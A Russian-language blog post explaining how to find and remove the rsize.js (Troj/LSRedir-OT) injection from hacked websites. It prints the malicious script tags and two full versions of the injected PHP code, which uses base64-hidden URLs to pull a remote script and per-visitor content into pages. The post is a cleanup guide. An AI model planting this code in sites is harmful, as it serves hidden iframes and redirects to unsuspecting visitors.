удаление вируса Troj/LSRedir-OT

Довольно часто встречается данный вердикт на сайтах. Но в сети он более известен как rsize.js.
Подгружаемый скрипт добавляет тег iframe, который обычно размещается вне видимой области страницы.

На взломанных сайтах подгрузка идет с разных источников одного домена, вот примеры:

<script src="//newdomme.changeip. name/rsize.js"></script>
<script src="//touchme.changeip. name/rsize.js"></script>

За генерацию данной ставки отвечает один из следующих кодов, вставленный в один из php-файлов вашего движка:

function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {
                if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
                $ip = $_SERVER['REMOTE_ADDR'];
                $file = @fopen ($get, "r");
                $content = @fread($file, 1000);
                @setcookie("iJijkdaMnerys", $value, time()+3600*24);
                if (!$content)
                        echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9wYWtlc3JyeS5pbmZvL3JzaXplLmpzIj48L3NjcmlwdD4=");
                else
                        echo $content;

                }
}
collectnewss ();
function sql2_safe($in) {
$rtn = base64_decode($in);
return $rtn;
}
function collectnewss() {

if (!isset($_COOKIE["iJijkdaMnerys"])) {
$value = 'yadeor';
$ip = $_SERVER['REMOTE_ADDR'];
$get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
$file = @fopen ($get, "r");
$content = @fread($file, 1000);
@setcookie("iJijkdaMnerys", $value, time()+3600*24);
if (!$content)
echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9jaGFuZ2VpcC5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
else 
echo $content;

}
}
collectnewss ();

Либо вставка может быть сделана напрямую в шаблон указанным выше кодом.
Причиной появления вставок являются шаблоны, скачанные с сайтов «бесплатных шаблонов».
Будьте аккуратны :-) !!!

Скажите свое мнение

ваш email не публикуется. обязательно *

;-) :yawn: :whew: :toivo: :tmi: :time: :thinking: :talking: :sweating: :swear: :sun: :star: :smoke: :smirk: :sleepy: :skype: :shock: :shake: :rofl: :rain: :punch: :puke: :poolparty: :pizza: :phone: :party: :oops: :nod: :no: :ninja: :neutral: :nerd: :music: :muscle: :mrgreen: :movie: :mooning: :mmm: :middlefinger: :makeup: :mail: :mad: :lol: :lipssealed: :kiss: :itwashtme: :inlove: :idea: :hi: :heidy: :heart: :headbang: :happy: :handshake: :giggle: :fubar: :flower: :evilgrin: :emo: :dull: :drunk: :drink: :doh: :devil: :dance: :cry: :cool: :coffie: :clapping: :cash: :call: :cake: :bug: :brokenheart: :bow: :blush: :beer: :bear: :bandit: :arrow: :angry: :angel: :^) :???: :?: :-| :-o :-P :-D :-) :-( :!:

 

*

code

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.